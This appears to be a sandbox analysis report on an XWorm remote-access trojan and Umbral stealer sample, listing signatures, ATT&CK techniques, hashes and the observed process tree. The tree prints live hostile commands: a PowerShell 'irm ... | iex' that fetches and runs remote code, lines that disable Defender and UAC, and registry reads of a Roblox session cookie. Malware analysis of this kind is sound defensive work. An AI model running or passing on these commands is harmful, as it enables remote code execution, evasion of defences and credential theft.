Overview

overview

10

Static

static

1

New Text Document.txt

windows10-ltsc 2021-x64

10

New Text Document.txt

windows11-21h2-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    299s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    04-01-2025 18:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New Text Document.txt

  • Size

    48B

  • MD5

    534f5be9d239737fc0f7988c0d8f55ab

  • SHA1

    7bd8add72810ae2c725bcbd4f001ee37e1aef16e

  • SHA256

    bd9337e4327ce6c4b8cf3c2de54bc60605f93d59a87e4e6f1b9d90a4d73ec3bf

  • SHA512

    e6447c19a57b17c252f9569c22b737ae9ca2afb7ef307bf3d7513af96c4b95e1f66280277ad22c9e8cff0db99f6aea02c12965a04568766d2c2e2101e6f2f93b

Score
10/10
umbralxwormevasionexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

AEfEUs08j7ZtP2B5

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/pv132qGS

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\system32\NOTEPAD.EXE
    C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"
    1⤵
      PID:3628
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell "irm paste.fo/raw/7085afc2db6e | iex"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4584
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord
          3⤵
          • UAC bypass
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:716
        • C:\ProgramData\SVrB5SO0.exe
          "C:\ProgramData\SVrB5SO0.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:60
          • C:\Users\Admin\AppData\Local\Temp\svhost.exe
            "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
            4⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4768
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svhost.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4256
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4388
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4244
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4348
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" os get Caption
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4808
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" computersystem get totalphysicalmemory
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3236
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4388
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2336
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              5⤵
              • Detects videocard installed
              • Suspicious behavior: EnumeratesProcesses
              PID:2536
          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1160
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3148
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3748
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4664
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2112

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Credentials from Password Stores

    1
    T1555

    Credentials from Web Browsers

    1
    T1555.003

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    3
    T1082

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Command and Control

    Web Service

    1
    T1102

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\SVrB5SO0.exe
      Filesize

      122KB

      MD5

      23c81c7ea6b302b5171d035742228599

      SHA1

      83f6712a0f42802d39356edabf6b74f37e049edd

      SHA256

      797ec2edd1d1a40a58004e5cda724f010310cdb388c368cb19ebc2aef0505a51

      SHA512

      931a6d93ce3422479479f5cdd073781cfd5d35e0244996242138f2dc2ffec953a43922d4fa14b16dab661dfe58a0331e7d1b208f04a39f03d0ad2ab7bb1fb962

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      a5a313c269d40f81599ab2eefb92eed9

      SHA1

      552556a49fc472b0e393dc781d2829e17b33696a

      SHA256

      c898258b3a76429d23f5d5ade7656d456b95db4a89706661c3c42ad265d09248

      SHA512

      cd987bdf29fc0a0b72f9b9b74d9f6302250f1ebd3d25bff034b86d6626b86d330867bfc154c58a6d275b35ae9c8d10eca5d0090d53238064a4f12b0dfe0279ac

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      7230ed8c80fb91119c40c4e67d1f00fd

      SHA1

      c19f2601b8a2b2a2737746b88f98129a2f00fdf5

      SHA256

      c24a82bfe4b8218e6472444f025b6830978f0f7c3c8cbd9babcff9849a8d9f5b

      SHA512

      286bed9de29ea9cb9de834164f6848a35992136b34bcc2a0c0d8529a8777bab3dcff97a9e28bbcd31bd1c65ac7d31d2c2ef629dc6aedb9a376ceb1dd92871256

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      cce846d4d061ab3c9c60e2e4723afc37

      SHA1

      dbfb35606ef1ba6a8fe0761baf0a5a8d61ddc3d0

      SHA256

      05493954effa576bee288b5da8a22c2b8cf6b3f1f7a7f49d430ff7c959e78385

      SHA512

      c21366673b03e1fd661acba46d00200f83df5a40668f1c39abcf6e0d92370a8fc40758e487566fd7066b185f0658d9f149f293dce01235b60fbac8c40f4d7172

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      70c9d01fc2096706bfe72bc21a45c108

      SHA1

      256ba8ffe84ef7dd9d77900ece1a43a636cd98e1

      SHA256

      ea9ff8be4d6e90a9458c41c335d17eb32c1eef0babe7e8c103e22ee553f37f68

      SHA512

      bfb1a87344304d21e2a8e35e1ebfffa987dba9bf6c07b396a41b405670f1e44d9cb1884599ef943259ba05769873be144179ff52046e1ebb4a03bce4c52e3720

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      0586e4d581f74667aa789f5c0d00defb

      SHA1

      a32d715cc40f7f6c7b1ae83c6719ab913eda9d5b

      SHA256

      4c6d8dfece226095f6ce6c8c5a483d6660e020688f973cef35e970c91c4d605a

      SHA512

      10c6e93f5409c3287b088bf129d33b7ee99a3f54cdcf6f9828eab1b17fa199b9d1a0316a0f70718544327e0ff8cf258393db6d20e8d560b9b85fc956d0b4cdf2

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      13e75a3f969f37dc72fd4852bdc7083c

      SHA1

      7dddedb04f386a47666202ca6597d90a2a04aad1

      SHA256

      f6c41d71efdb8e40b75efeeb26cfa0ad2789082baf128aee3a5dca26409077cf

      SHA512

      b92b49d957a2726b5001d515495a74f175965212da6c54d5fe6e4d35d8d5f6e38eccd3501dba1b26ac67ff86ffd9ceb1a34a6e0402417fd7583eca47a57dbd07

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      14ade977d5aee19d8d43a5545fb17aa4

      SHA1

      2f09f41411cd31ea761e878ef477a0a15f037823

      SHA256

      313690a5bea10becc948a438d4197abe7d6116e1f36cc094bfe63ac4b76bc704

      SHA512

      f7bf8a2e6a5fe5e4c60873e8e053227f7fdeb46a7336d95ae08b3aefa3e46c4310ac5185903f9854172604b1f1cdfffa7a9aeeea11464adebe6d999f46f999c9

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4336c1dcbfcf6963151f02a4bd556cc8

      SHA1

      f8ca05659224c4e6b35d0ec0b2bbb36cfc9b0b70

      SHA256

      9c1bbc5cee1d7b64f7a419a9513d2b3fb6468105d3ea1e8e9277a1f8ec813f8a

      SHA512

      6019711045a6f7de275f1958e4ad65366089c7ef3274a51fe985ccf5dea59e8c7b857b26ff94d476455e528115a20f7e02e4f744bdbd177253aa45279c6d8132

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      8cf2897e70a6afaf934a40e7818165c1

      SHA1

      5cb27c6bfd3fbe0950ef6a3d0917efb37dac1eb4

      SHA256

      3353b18f2f88189eb9d3aba57309f5ca6a259c396b08185d4d941ed15d3283b0

      SHA512

      0fa0b94a7f1d2f429ab0e49e88e35e10e8f81f429dfdcc39c8f3a1bd3df96445409e0a5bedb2e15cbaa69b4c852e0ff1cd0faf361753ac33aaced2dcdbd60a2f

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      af1cc13f412ef37a00e668df293b1584

      SHA1

      8973b3e622f187fcf484a0eb9fa692bf3e2103cb

      SHA256

      449c0c61734cf23f28ad05a7e528f55dd8a7c6ae7a723253707e5f73de187037

      SHA512

      75d954ec8b98f804d068635875fac06e9594874f0f5d6e2ad9d6267285d1d4a1de6309009de9e2956c6477a888db648396f77a1a49b58287d2683b8214e7a3d3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blharyk0.kwd.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
      Filesize

      39KB

      MD5

      f705f2da1824f04ae5a190b8259c3971

      SHA1

      7e8f02accd7205e564696e791c4dbef66f2b3bd5

      SHA256

      06daf892bd82e2da28a493b7c9dff9b4d822e1d0ba55671772cd032885d6fb4f

      SHA512

      530d56a52067f26d9d50d8edefb68caa65b6be9c58692fc14c417fee7799e3f1ed1ba57b2159be91965034f733a5de7af5042b2297d6f02a6ad282b5b4aa0d56

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\svhost.exe
      Filesize

      231KB

      MD5

      0c01352317f572daab13794a8dc3e3a5

      SHA1

      309b2c1c1d7ea267e4fec39b67f26450d72b30d5

      SHA256

      6c85ac3b26d88512a75af25509b4c5f0a1e345e9c03b3a38884382a70a4748bd

      SHA512

      7ccb1b18ce0090a83938cb84f98104714bb9866ab82df04ffc5a682f3bb7ad76cdf59c0b95cc2a725f58af4358c0f25537087e937296f45f54214d31aa4726ad

      Download Submit

    • memory/60-44-0x0000000000260000-0x0000000000284000-memory.dmp

      Filesize

      144KB

      Download

    • memory/1160-75-0x0000000000A50000-0x0000000000A60000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4584-28-0x00007FF9FE003000-0x00007FF9FE005000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4584-13-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4584-194-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4584-1-0x0000015D6A7B0000-0x0000015D6A7D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4584-11-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4584-29-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4584-0-0x00007FF9FE003000-0x00007FF9FE005000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4584-14-0x0000015D6B020000-0x0000015D6B1E2000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/4584-12-0x00007FF9FE000000-0x00007FF9FEAC2000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4768-136-0x0000022D456B0000-0x0000022D456BA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4768-73-0x0000022D2AFE0000-0x0000022D2B020000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4768-137-0x0000022D45740000-0x0000022D45752000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4768-102-0x0000022D45680000-0x0000022D4569E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4768-101-0x0000022D457A0000-0x0000022D45816000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4768-100-0x0000022D456D0000-0x0000022D45720000-memory.dmp

      Filesize

      320KB

      Download